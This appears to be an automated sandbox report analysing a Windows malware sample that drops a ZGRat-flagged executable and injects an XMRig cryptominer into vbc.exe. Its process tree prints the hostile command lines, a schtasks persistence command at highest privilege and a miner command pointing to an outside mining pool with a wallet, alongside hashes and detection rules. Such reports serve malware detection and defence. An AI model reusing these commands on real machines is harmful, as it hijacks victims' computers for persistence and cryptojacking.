Overview
overview
10Static
static
102LRS3ODTLG...JL.exe
windows10-1703-x64
102LRS3ODTLG...JL.exe
windows11-21h2-x64
106G2SZLVHVH...3B.exe
windows10-1703-x64
106G2SZLVHVH...3B.exe
windows11-21h2-x64
106TS3GUANXW9E1KF8.exe
windows10-1703-x64
106TS3GUANXW9E1KF8.exe
windows11-21h2-x64
10G9NB5XSAH0XAAPCN.exe
windows10-1703-x64
6G9NB5XSAH0XAAPCN.exe
windows11-21h2-x64
6PV0HLG9QQ3...NU.exe
windows10-1703-x64
10PV0HLG9QQ3...NU.exe
windows11-21h2-x64
10Protect544cd51a.dll
windows10-1703-x64
1Protect544cd51a.dll
windows11-21h2-x64
1PsExec.exe
windows10-1703-x64
1PsExec.exe
windows11-21h2-x64
1W7W5WFGX1D...7O.exe
windows10-1703-x64
3W7W5WFGX1D...7O.exe
windows11-21h2-x64
6skz3rpen.kc1.exe
windows10-1703-x64
1skz3rpen.kc1.exe
windows11-21h2-x64
1Analysis
-
max time kernel
227s -
max time network
333s -
platform
windows11-21h2_x64 -
resource
win11-20231215-en -
resource tags
arch:x64arch:x86image:win11-20231215-enlocale:en-usos:windows11-21h2-x64system -
submitted
26-01-2024 19:03
Behavioral task
behavioral1
Sample
2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe
Resource
win10-20231215-en
Behavioral task
behavioral2
Sample
2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe
Resource
win11-20231222-en
Behavioral task
behavioral3
Sample
6G2SZLVHVHUJV21JB2FOVQKM701Z63B.exe
Resource
win10-20231215-en
Behavioral task
behavioral4
Sample
6G2SZLVHVHUJV21JB2FOVQKM701Z63B.exe
Resource
win11-20231215-en
Behavioral task
behavioral5
Sample
6TS3GUANXW9E1KF8.exe
Resource
win10-20231220-en
Behavioral task
behavioral6
Sample
6TS3GUANXW9E1KF8.exe
Resource
win11-20231215-en
Behavioral task
behavioral7
Sample
G9NB5XSAH0XAAPCN.exe
Resource
win10-20231215-en
Behavioral task
behavioral8
Sample
G9NB5XSAH0XAAPCN.exe
Resource
win11-20231222-en
Behavioral task
behavioral9
Sample
PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe
Resource
win10-20231220-en
Behavioral task
behavioral10
Sample
PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe
Resource
win11-20231215-en
Behavioral task
behavioral11
Sample
Protect544cd51a.dll
Resource
win10-20231215-en
Behavioral task
behavioral12
Sample
Protect544cd51a.dll
Resource
win11-20231215-en
Behavioral task
behavioral13
Sample
PsExec.exe
Resource
win10-20231215-en
Behavioral task
behavioral14
Sample
PsExec.exe
Resource
win11-20231215-en
Behavioral task
behavioral15
Sample
W7W5WFGX1D82S3EIURREUP57O.exe
Resource
win10-20231215-en
Behavioral task
behavioral16
Sample
W7W5WFGX1D82S3EIURREUP57O.exe
Resource
win11-20231222-en
Behavioral task
behavioral17
Sample
skz3rpen.kc1.exe
Resource
win10-20231215-en
Behavioral task
behavioral18
Sample
skz3rpen.kc1.exe
Resource
win11-20231215-en
General
-
Target
6TS3GUANXW9E1KF8.exe
-
Size
5.6MB
-
MD5
1a27bd843a09f923661a15300e02d703
-
SHA1
5cb66b20c4cbda0cd080bb2380034d7da9cc7ce6
-
SHA256
8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1
-
SHA512
330a78e0214304d4786d8d2d98905fbff7c530042eac93ea133995661a7432c60a9bb052804598479c461da6bef4bfdbffb8a5e8cd473fd6a96ff0012ceaab05
-
SSDEEP
49152:q6orqtRW0jfH4+8MjRJHiEpxxH4vNpQXGp8mih7NUfXUu4tEqNrqcqapPeDkwVzO:foWjZG/Mul2rq/aReDkizMeQU4T
Malware Config
Signatures
-
Detect ZGRat V1 2 IoCs
Processes:
resource yara_rule behavioral6/memory/3828-0-0x0000000000290000-0x0000000000830000-memory.dmp family_zgrat_v1 behavioral6/files/0x000200000002a7cd-12.dat family_zgrat_v1 -
XMRig Miner payload 22 IoCs
Processes:
resource yara_rule behavioral6/memory/5772-23-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral6/memory/5772-24-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral6/memory/5772-26-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral6/memory/5772-27-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral6/memory/5772-28-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral6/memory/5772-29-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral6/memory/5772-30-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral6/memory/5772-31-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral6/memory/5772-32-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral6/memory/5772-34-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral6/memory/5772-35-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral6/memory/5772-36-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral6/memory/5772-37-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral6/memory/5772-40-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral6/memory/2364-57-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral6/memory/2364-58-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral6/memory/2364-59-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral6/memory/2364-60-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral6/memory/2364-61-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral6/memory/2364-62-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral6/memory/2364-63-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral6/memory/2364-64-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule behavioral6/memory/3828-0-0x0000000000290000-0x0000000000830000-memory.dmp net_reactor behavioral6/files/0x000200000002a7cd-12.dat net_reactor -
Executes dropped EXE 2 IoCs
Processes:
.exe.exepid Process 3936 .exe 3116 .exe -
Processes:
resource yara_rule behavioral6/memory/5772-18-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral6/memory/5772-20-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral6/memory/5772-21-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral6/memory/5772-23-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral6/memory/5772-24-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral6/memory/5772-26-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral6/memory/5772-27-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral6/memory/5772-28-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral6/memory/5772-29-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral6/memory/5772-30-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral6/memory/5772-31-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral6/memory/5772-32-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral6/memory/5772-34-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral6/memory/5772-35-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral6/memory/5772-36-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral6/memory/5772-37-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral6/memory/5772-40-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral6/memory/2364-53-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral6/memory/2364-57-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral6/memory/2364-58-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral6/memory/2364-59-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral6/memory/2364-60-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral6/memory/2364-61-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral6/memory/2364-62-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral6/memory/2364-63-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral6/memory/2364-64-0x0000000140000000-0x00000001407DC000-memory.dmp upx -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
.exe.exedescription pid Process procid_target PID 3936 set thread context of 5772 3936 .exe 87 PID 3116 set thread context of 2364 3116 .exe 93 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid Process 3952 schtasks.exe 4936 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid Process 2392 timeout.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
.exe.exepid Process 3936 .exe 3116 .exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid Process 652 652 -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
6TS3GUANXW9E1KF8.exe.exevbc.exe.exevbc.exedescription pid Process Token: SeDebugPrivilege 3828 6TS3GUANXW9E1KF8.exe Token: SeDebugPrivilege 3936 .exe Token: SeLockMemoryPrivilege 5772 vbc.exe Token: SeLockMemoryPrivilege 5772 vbc.exe Token: SeDebugPrivilege 3116 .exe Token: SeLockMemoryPrivilege 2364 vbc.exe Token: SeLockMemoryPrivilege 2364 vbc.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
vbc.exevbc.exepid Process 5772 vbc.exe 2364 vbc.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
6TS3GUANXW9E1KF8.execmd.exe.execmd.exe.execmd.exedescription pid Process procid_target PID 3828 wrote to memory of 1740 3828 6TS3GUANXW9E1KF8.exe 79 PID 3828 wrote to memory of 1740 3828 6TS3GUANXW9E1KF8.exe 79 PID 1740 wrote to memory of 2392 1740 cmd.exe 81 PID 1740 wrote to memory of 2392 1740 cmd.exe 81 PID 1740 wrote to memory of 3936 1740 cmd.exe 82 PID 1740 wrote to memory of 3936 1740 cmd.exe 82 PID 3936 wrote to memory of 2292 3936 .exe 83 PID 3936 wrote to memory of 2292 3936 .exe 83 PID 2292 wrote to memory of 3952 2292 cmd.exe 85 PID 2292 wrote to memory of 3952 2292 cmd.exe 85 PID 3936 wrote to memory of 5772 3936 .exe 87 PID 3936 wrote to memory of 5772 3936 .exe 87 PID 3936 wrote to memory of 5772 3936 .exe 87 PID 3936 wrote to memory of 5772 3936 .exe 87 PID 3936 wrote to memory of 5772 3936 .exe 87 PID 3936 wrote to memory of 5772 3936 .exe 87 PID 3936 wrote to memory of 5772 3936 .exe 87 PID 3116 wrote to memory of 4700 3116 .exe 89 PID 3116 wrote to memory of 4700 3116 .exe 89 PID 4700 wrote to memory of 4936 4700 cmd.exe 92 PID 4700 wrote to memory of 4936 4700 cmd.exe 92 PID 3116 wrote to memory of 2364 3116 .exe 93 PID 3116 wrote to memory of 2364 3116 .exe 93 PID 3116 wrote to memory of 2364 3116 .exe 93 PID 3116 wrote to memory of 2364 3116 .exe 93 PID 3116 wrote to memory of 2364 3116 .exe 93 PID 3116 wrote to memory of 2364 3116 .exe 93 PID 3116 wrote to memory of 2364 3116 .exe 93 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\6TS3GUANXW9E1KF8.exe"C:\Users\Admin\AppData\Local\Temp\6TS3GUANXW9E1KF8.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3828 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD8EB.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:2392
-
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3936 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"5⤵
- Creates scheduled task(s)
PID:3952
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5772
-
-
-
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exeC:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"3⤵
- Creates scheduled task(s)
PID:4936
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2364
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.6MB
MD51a27bd843a09f923661a15300e02d703
SHA15cb66b20c4cbda0cd080bb2380034d7da9cc7ce6
SHA2568ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1
SHA512330a78e0214304d4786d8d2d98905fbff7c530042eac93ea133995661a7432c60a9bb052804598479c461da6bef4bfdbffb8a5e8cd473fd6a96ff0012ceaab05
-
Filesize
1KB
MD5bfc047647012a7b8e2b26e9a4369e1c5
SHA12dbf50cfcff0e1ca3312316dd7066fc623834eb0
SHA25629d02afb829467cbd7db970ff3e1471b688384b0c50ad147100d5ed950e68435
SHA512c55e6a071fc4f61df81f59ac24258413a1bc6a26d18271be57ae2fb8809b9584d0d0d0dccde0a5b6ec0859110dee6db3ec70117d7814946c7b578b649cec4221
-
Filesize
168B
MD5db43602afe3b13bc395785d971559d87
SHA1e5712bb990f9f2c679c8fce0ec15998cf19bea2d
SHA2566013abf92230f1e9b86e740404acab2d1c02c3b446ede8fd651c5048fdcd1f18
SHA5120fc41ff7562406341633d322bba98ece124f98139ed2347c6434c95ead09d3990cb44ff3fc23a39d0885e6f61509f7a4c277f95fec2bdd6907d7c493ba48ddee